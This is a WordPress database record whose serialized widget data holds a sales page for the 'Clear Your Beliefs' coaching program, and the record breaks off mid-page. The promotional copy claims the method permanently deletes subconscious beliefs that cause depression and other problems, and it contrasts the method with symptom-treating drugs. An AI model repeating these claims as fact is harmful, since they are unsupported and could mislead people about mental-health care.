(1624, 2053, 'panels_data', 'a:3:{s:7:"widgets";a:26:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:529:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>\n\n<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"13";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:14;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:62988:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a 